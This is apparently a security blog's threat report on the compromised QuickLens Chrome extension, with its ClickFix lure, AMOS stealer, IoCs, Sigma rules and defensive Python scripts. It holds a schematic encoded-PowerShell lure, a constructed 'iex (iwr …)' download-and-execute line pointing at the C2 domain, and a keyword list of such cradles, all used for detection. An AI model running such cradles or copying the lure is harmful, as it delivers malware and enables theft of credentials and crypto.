What Happened
A popular Chrome extension called QuickLens — Search Screen with Google Lens has been removed from the Chrome Web Store after being compromised to push malware via ClickFix social engineering attacks and steal cryptocurrency from thousands of users.
On February 17, 2026, version 5.8 of QuickLens was released containing malicious scripts that introduced ClickFix-style fake prompts and info-stealing capabilities. Google has since removed the extension and Chrome now automatically disables it for affected users.
How the Attack Works
The compromise follows a multi-stage attack chain combining supply chain poisoning with social engineering:
Stage 1: Extension Compromise
The legitimate QuickLens extension was updated with malicious code — either through a compromised developer account or a supply chain attack on the extension's build pipeline. Users received the malicious update automatically through Chrome's extension auto-update mechanism.
Stage 2: C2 Contact
The injected payload contacts google-update[.]icu, a domain designed to look like legitimate Google infrastructure. The C2 server responds with a secondary payload.
Stage 3: ClickFix Social Engineering
The second-stage payload displays a fake Google Update prompt. When users click the update button, they are shown a ClickFix lure: a fake "verify you are human" dialog. The lure page has already copied a command to the clipboard, and the dialog walks the user through pasting and running it themselves, so the user, not the browser, carries the payload onto the system.
```text
Fake prompt: "Google Chrome needs to verify you are human"
→ Instructs user to: Win+R → Paste clipboard → Enter
→ Clipboard contains: powershell -e [base64 encoded payload]
```
Stage 4: AMOS Stealer Deployment
Reports indicate that macOS users were targeted with AMOS (Atomic Stealer), a well-known infostealer that collects:
- Browser-stored passwords and cookies
- Cryptocurrency wallet data and private keys
- Keychain credentials
- Desktop files and documents
Why ClickFix Is So Effective
ClickFix has become one of the most successful social engineering techniques in 2026, responsible for delivering 59% of identified malware families in browser-based attacks. The technique works because:
- Bypasses browser security — no browser exploit is needed; the user carries the payload out of the sandbox and executes it with their own privileges
- Looks legitimate — mimics real browser update or verification prompts
- Exploits trust — appears to come from Google Chrome itself
- Avoids download-based detection — nothing lands in the Downloads folder for Safe Browsing or AV download scanning to inspect; the command does still appear in process-creation telemetry, which is where the hunting rules below look
- Cross-platform — variants target both Windows (PowerShell) and macOS (Terminal)
The Bigger Picture: 337K Users Compromised
QuickLens is part of a larger wave of malicious Chrome extensions targeting cryptocurrency. Recent research found 337,000+ Chrome users compromised across multiple campaigns with capabilities including:
- Theft across 22 different browser types
- Private key and wallet address extraction
- OAuth2 token extraction from Chromium browsers
- Telegram and Discord data theft
- VPN configuration harvesting
These operations originated from 15 countries including the US, Canada, India, Japan, and across Europe.
MITRE ATT&CK Mapping
| Technique | ID | Tactic |
|---|---|---|
| Supply Chain Compromise: Compromise Software Supply Chain | T1195.002 | Initial Access |
| User Execution: Malicious Copy and Paste | T1204.004 | Execution |
| Command and Scripting Interpreter: PowerShell | T1059.001 | Execution |
| Command and Scripting Interpreter: Unix Shell (macOS Terminal variant) | T1059.004 | Execution |
| Credentials from Password Stores: Credentials from Web Browsers | T1555.003 | Credential Access |
| Credentials from Password Stores: Keychain | T1555.001 | Credential Access |
| Steal Web Session Cookie | T1539 | Credential Access |
| Data from Local System | T1005 | Collection |
| Exfiltration Over C2 Channel | T1041 | Exfiltration |
| Software Extensions: Browser Extensions | T1176.001 | Persistence |
Indicators of Compromise
| Type | Value | Context |
|---|---|---|
| Domain | google-update[.]icu | C2 / second-stage payload delivery |
| Extension | QuickLens v5.8+ | Compromised version |
| Malware | AMOS / Atomic Stealer | macOS infostealer payload |
Detection & Hunting
Browser Extension Audit
```powershell
# List all Chrome extensions with ID, name and version across every profile (Windows)
Get-ChildItem "$env:LOCALAPPDATA\Google\Chrome\User Data\*\Extensions\*\*\manifest.json" | ForEach-Object {
    $m = Get-Content -LiteralPath $_.FullName -Raw | ConvertFrom-Json
    # ID is two directories up; localized names show as __MSG_*__ (resolve via _locales if needed)
    "{0}  {1} v{2}" -f $_.Directory.Parent.Name, $m.name, $m.version
}
```
Network Detection
```yaml
title: ClickFix C2 Domain Contact
status: experimental
description: DNS lookups for the QuickLens second-stage domain and look-alike Google "update"/"verify" hosts on .icu
logsource:
    category: dns
detection:
    selection:
        query|endswith:
            - 'google-update.icu'
            - '-update.icu'
            - '-verify.icu'
    condition: selection
falsepositives:
    - Unknown
level: high
tags:
    - attack.command_and_control
```
PowerShell ClickFix Execution
```yaml
title: ClickFix PowerShell Clipboard Execution
status: experimental
description: Encoded PowerShell launched from the Run dialog (Win+R) or a shell window, the execution path ClickFix lures walk victims through
logsource:
    product: windows
    category: process_creation
detection:
    selection_img:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
        ParentImage|endswith:
            - '\explorer.exe'
            - '\cmd.exe'
    selection_enc:
        # PowerShell accepts any unambiguous prefix of -EncodedCommand
        CommandLine|contains:
            - ' -e '
            - ' -ec '
            - ' -enc'
            - ' -EncodedCommand'
    filter_known:
        # organisation-specific deployment scripts go here
        CommandLine|contains: 'WindowsUpdate'
    condition: selection_img and selection_enc and not filter_known
falsepositives:
    - Administrators manually running encoded one-liners from a Run dialog or cmd window
level: high
tags:
    - attack.execution
    - attack.t1059.001
    - attack.t1204.004
```
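To see the rule logic above actually applied, here is an added example (not code from the original article) that triages Windows process-creation events for the clipboard-to-PowerShell pattern described in Stage 3. It recognises every unambiguous spelling of -EncodedCommand, decodes the UTF-16LE base64 payload, and rates an encoded command launched under explorer.exe (the Win+R path) higher than the same flag arriving from a management agent. The sample events and the payload text are constructed; the payload only reuses the C2 domain from the IoC table, and the real second-stage script is not reproduced here.

```python
"""Triage Windows process-creation events for the ClickFix clipboard-to-PowerShell pattern.

Added example, not code from the original article. Field names follow Sigma's Windows
process_creation conventions (Image, ParentImage, CommandLine); the events and the payload
text below are constructed, and the payload only reuses the C2 domain from the IoC table.
"""
import base64
from typing import Optional

RUN_DIALOG_PARENT = "\\explorer.exe"   # Win+R runs the typed command as a child of explorer.exe
# Download-and-execute idioms that show up in decoded ClickFix payloads
CRADLES = ("iex", "invoke-expression", "iwr", "invoke-webrequest", "downloadstring",
           "frombase64string", "mshta", "curl ")


def is_encoded_flag(token: str) -> bool:
    """PowerShell accepts -e, -ec and any unambiguous prefix of -EncodedCommand.
    -ex (ExecutionPolicy) and -ep must not match."""
    t = token.lower().lstrip("-/")
    return t == "ec" or (t != "" and "encodedcommand".startswith(t))


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE text behind the encoded-command flag, or None if absent/undecodable."""
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        if is_encoded_flag(flag):
            try:
                return base64.b64decode(value, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def triage(event: dict) -> dict:
    """'high': encoded PowerShell whose parent is explorer.exe (the Run-dialog path the lure
    walks the victim through). 'medium': encoded PowerShell from any other parent. 'low': rest."""
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").lower()
    from_run_dialog = "powershell" in cmd.lower() and parent.endswith(RUN_DIALOG_PARENT)
    decoded = decode_encoded_command(cmd)
    reasons = []
    if from_run_dialog:
        reasons.append("powershell spawned by explorer.exe (Run dialog)")
    if decoded is not None:
        reasons.append("encoded command")
        if any(c in decoded.lower() for c in CRADLES):
            reasons.append("download-and-execute cradle in decoded payload")
    if decoded is not None and from_run_dialog:
        verdict = "high"
    elif decoded is not None:
        verdict = "medium"
    else:
        verdict = "low"
    return {"verdict": verdict, "reasons": reasons, "decoded": decoded}


def _encode(ps: str) -> str:
    """Build the -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed stand-in for the clipboard content described in Stage 3 (real script unknown)
CLICKFIX_PAYLOAD = "iex (iwr -UseBasicParsing http://google-update.icu/).Content"

SAMPLE_EVENTS = [  # constructed, modelled on Sysmon Event ID 1 records
    {   # Victim follows the lure: Win+R, paste, Enter
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": f"powershell -w hidden -e {_encode(CLICKFIX_PAYLOAD)}",
    },
    {   # Admin launching a script from the Run dialog; -ExecutionPolicy is not -e
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1",
    },
    {   # Management agent pushing an encoded one-liner: worth review, not the ClickFix shape
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\CCM\CcmExec.exe",
        "CommandLine": f"powershell -NoProfile -EncodedCommand {_encode('Get-Service WinRM')}",
    },
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        r = triage(ev)
        print(f"{r['verdict']:6} {ev['ParentImage']:32} {'; '.join(r['reasons'])}")
```

Run it against a Sysmon or EDR export converted to the same three fields; the second sample event is the false-positive trap that the original rule's `'-e '` substring would have caught, and the third shows why parent process matters more than the encoded flag alone.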
Immediate Actions
- Check your extensions — go to chrome://extensions and remove QuickLens immediately
- Scan for malware — run a full system scan with updated AV
- Reset all browser passwords — assume stored credentials are compromised
- Move crypto to new wallets — if you used browser-based wallets, generate new keys and transfer funds
- Enable 2FA everywhere — especially on exchanges and financial accounts
- Review OAuth tokens — revoke any suspicious app authorizations
- Monitor accounts — watch for unauthorized transactions for the next 30 days
Lessons for Defenders
The QuickLens incident reinforces a critical truth: browser extensions are supply chain attack vectors. Organizations should:
- Maintain an allowlist of approved extensions via Chrome Enterprise policies
- Block side-loading and limit extension permissions
- Monitor for ClickFix indicators — clipboard-to-PowerShell execution patterns
- Educate users that legitimate services never ask you to run commands via Win+R or Terminal
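The allowlist and side-loading controls in the first two points map onto Chrome's ExtensionSettings and BlockExternalExtensions policies. The following is an added example, not part of the original article: it builds a deny-by-default policy from a small allowlist, rejects malformed extension IDs, and checks an installed-extension inventory (the id, name, version shape the audit script above prints) against that policy. The extension IDs and inventory entries are constructed placeholders; QuickLens's real store ID is not given in the article.

```python
"""Chrome Enterprise extension allowlisting (added example, not from the original article).

Builds the ExtensionSettings policy that blocks every extension except an explicit allowlist,
denies side-loaded (external) extensions via BlockExternalExtensions, and checks an
installed-extension inventory against it. Policy keys are Chrome's documented names; the
extension IDs and the inventory are constructed placeholders.
"""
import json

WEBSTORE_UPDATE_URL = "https://clients2.google.com/service/update2/crx"  # required for force_installed
# Permissions no approved extension in this example fleet needs; applied to every extension via "*"
DENIED_PERMISSIONS = ["clipboardWrite", "nativeMessaging", "debugger", "proxy"]
ID_ALPHABET = set("abcdefghijklmnop")  # Web Store IDs are 32 lowercase letters a-p


def build_policy(allowlist: dict) -> dict:
    """allowlist maps extension ID -> label. Everything not listed is blocked and removed."""
    settings = {
        "*": {
            "installation_mode": "blocked",
            "blocked_permissions": DENIED_PERMISSIONS,
            "blocked_install_message": "Only approved extensions may be installed. Contact IT.",
        }
    }
    for ext_id, label in allowlist.items():
        if len(ext_id) != 32 or not set(ext_id) <= ID_ALPHABET:
            raise ValueError(f"{label}: {ext_id!r} is not a valid Web Store extension ID")
        settings[ext_id] = {"installation_mode": "force_installed", "update_url": WEBSTORE_UPDATE_URL}
    return {"ExtensionSettings": settings, "BlockExternalExtensions": True}


def evaluate_inventory(inventory: list, policy: dict) -> dict:
    """Sort each installed (id, name, version) into what the policy will do with it."""
    settings = policy["ExtensionSettings"]
    outcome = {"allowed": [], "blocked": []}
    for ext_id, name, version in inventory:
        mode = settings.get(ext_id, settings["*"])["installation_mode"]
        bucket = "allowed" if mode in ("allowed", "force_installed", "normal_installed") else "blocked"
        outcome[bucket].append(f"{name} v{version} ({ext_id})")
    return outcome


def managed_policy_json(policy: dict) -> str:
    """Linux/ChromeOS drop-in for /etc/opt/chrome/policies/managed/. On Windows the same
    dictionary goes under HKLM\\SOFTWARE\\Policies\\Google\\Chrome as a REG_SZ holding the JSON text."""
    return json.dumps(policy, indent=2)


# Constructed allowlist; IDs are placeholders in the Web Store format
APPROVED = {
    "abcdefghijklmnopabcdefghijklmnop": "Corporate password manager",
    "ponmlkjihgfedcbaponmlkjihgfedcba": "Ad blocker approved by IT",
}
# Constructed inventory; the QuickLens ID here is a placeholder, not the real store ID
INVENTORY = [
    ("abcdefghijklmnopabcdefghijklmnop", "Corporate password manager", "3.2.1"),
    ("pppppppppppppppppppppppppppppppp", "QuickLens - Search Screen with Google Lens", "5.8"),
    ("aaaabbbbccccddddeeeeffffgggghhhh", "Random coupon finder", "1.0.4"),
]

if __name__ == "__main__":
    policy = build_policy(APPROVED)
    print(managed_policy_json(policy))
    print(evaluate_inventory(INVENTORY, policy))
```

Deny-by-default is the point: a compromised update to an allowlisted extension (the QuickLens scenario) is not stopped by this policy, which is why the detection rules above still matter, but every extension a user installs on their own, and every side-loaded one, is.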